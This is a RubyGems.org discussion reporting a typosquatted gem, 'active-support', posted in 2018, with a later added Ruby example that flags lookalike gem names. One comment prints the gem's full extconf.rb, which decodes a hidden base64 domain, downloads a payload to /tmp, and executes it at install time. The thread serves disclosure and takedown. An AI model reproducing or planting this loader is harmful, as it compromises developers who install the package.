<p>RubyGems.org: Discussion, 2018-08-09T13:10:57Z</p>
<p>Reporting Abuse on active-support, 2018-08-09T02:10:17Z</p>
<div><p>This seems like a bogus gem.<br>
Uses a very similar name to a very popular gem.<br>
Description seems off</p>
<p>Installation gives</p>
<p>Fetching gem metadata from <a href="https://rubygems.org/">https://rubygems.org/</a>.....<br>
Resolving dependencies...<br>
Fetching active-support 5.2.0<br>
Installing active-support 5.2.0 with native extensions<br>
Gem::Ext::BuildError: ERROR: Failed to build gem native extension.</p>
<p>current directory:<br>
/redacted/.rvm/gems/ruby-2.4.4/gems/active-support-5.2.0/ext/trellislike/unflaming/waffling<br>
/redacted/.rvm/rubies/ruby-2.4.4/bin/ruby -r ./siteconf20180809-44989-1mvw31o.rb extconf.rb<br>
extconf.rb:27:in `run': undefined method `install_exploit' for Smectis:Class (NoMethodError)<br>
Did you mean? install_explot<br>
from extconf.rb:31:in `'</p>
<p>extconf failed, exit code 1</p>
<p>Gem files will remain installed in /redacted/.rvm/gems/ruby-2.4.4/gems/active-support-5.2.0 for<br>
inspection.<br>
Results logged to<br>
/redacted/.rvm/gems/ruby-2.4.4/extensions/x86_64-darwin-17/2.4.0/active-support-5.2.0/gem_make.out</p>
<p>An error occurred while installing active-support (5.2.0), and Bundler cannot continue.<br>
Make sure that <code>gem install active-support -v '5.2.0' --source 'https://rubygems.org/'</code> succeeds<br>
before bundling.</p>
<p>In Gemfile:<br>
active-support</p></div>
<p>Guilherme Ramos</p>
<p>2018-08-09T02:15:12Z</p>
<div><p>Further investigation shows definite malware behaviour.</p>
<p>The gem duplicates official activesupport (no hyphen) code but adds a compiled extension.</p>
<p>active-support-5.2.0.gem/data/ext/trellislike/unflaming/waffling/extconf.rb<br>
attempts to resolve a base64 encoded domain, download a payload and execute.</p>
<pre><code>require 'net/http'
require 'uri'
require 'base64'
require 'resolv'

class Smectis
  def self.install_explot(weighership)
    if !weighership.nil? and weighership != '0.0.0.0'
      educable = Net::HTTP.get_response(URI('http://' + weighership + '/mimming'))
      File.open('/tmp/autosymbiontic', 'wb+') do |uterometer|
        uterometer.binmode
        uterometer.write(educable.body)
        uterometer.chmod(0777)
        uterometer.close
      end
      system('/tmp/autosymbiontic')
    end
  end

  def self.run()
    milligram = 'MjlmYWVhNjMucGxhbmZobnRhZ2UuZGU='
    jaunting = nil
    begin
      jaunting = Resolv.getaddress(Base64.decode64(milligram))
    rescue
    end
    self.install_exploit(jaunting)
  end
end

Smectis.run()</code></pre></div>
<p>Sam Giffney</p>
<p>2018-08-09T12:15:46Z</p>
<div><p>Probably the same thing with this gem from the same user: <a href="https://rubygems.org/gems/deamons">https://rubygems.org/gems/deamons</a></p></div>
<p>Patrick Figel</p>
<p>2018-08-09T13:10:56Z</p>
<div><p>Thanks for the report. We have removed the gem.</p></div>
<p>David Radcliffe</p>
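The naming trick reported in this thread (active-support published next to activesupport, and deamons from the same user) can be checked mechanically before a name is added to a Gemfile. The Ruby below is an added example, not code from this discussion or from RubyGems.org; the POPULAR list, the function names, and the assumption that deamons imitates daemons are all constructed for illustration.

```ruby
# Added example: flag gem names that imitate a well-known gem.
# POPULAR is a constructed sample list, not data pulled from RubyGems.org.
POPULAR = %w[activesupport daemons rails rake nokogiri].freeze

# Collapse case and separators so "active-support" and "active_support"
# both reduce to "activesupport".
def normalize(name)
  name.downcase.gsub(/[-_.]/, '')
end

# Optimal string alignment distance: insert, delete, substitute and
# adjacent transposition each cost 1, so a swapped letter pair counts once.
def osa_distance(a, b)
  d = Array.new(a.length + 1) { |i| [i] + [0] * b.length }
  (0..b.length).each { |j| d[0][j] = j }
  (1..a.length).each do |i|
    (1..b.length).each do |j|
      cost = a[i - 1] == b[j - 1] ? 0 : 1
      d[i][j] = [d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost].min
      if i > 1 && j > 1 && a[i - 1] == b[j - 2] && a[i - 2] == b[j - 1]
        d[i][j] = [d[i][j], d[i - 2][j - 2] + 1].min
      end
    end
  end
  d[a.length][b.length]
end

# Returns [popular_gem, reason] when the candidate looks like an imitation,
# or nil when it is an exact popular name or resembles none of them.
def lookalike_of(candidate, popular = POPULAR)
  return nil if popular.include?(candidate)
  norm = normalize(candidate)
  popular.each do |known|
    known_norm = normalize(known)
    return [known, :separator_variant] if norm == known_norm
    return [known, :one_edit_away] if osa_distance(norm, known_norm) == 1
  end
  nil
end

if __FILE__ == $PROGRAM_NAME
  %w[active-support deamons activesupport rspec].each do |name|
    hit = lookalike_of(name)
    puts hit ? "#{name}: resembles #{hit[0]} (#{hit[1]})" : "#{name}: no match"
  end
end
```

A hit is a prompt for manual review of the gem's owner and contents, not proof of malice: short legitimate names can sit one edit apart.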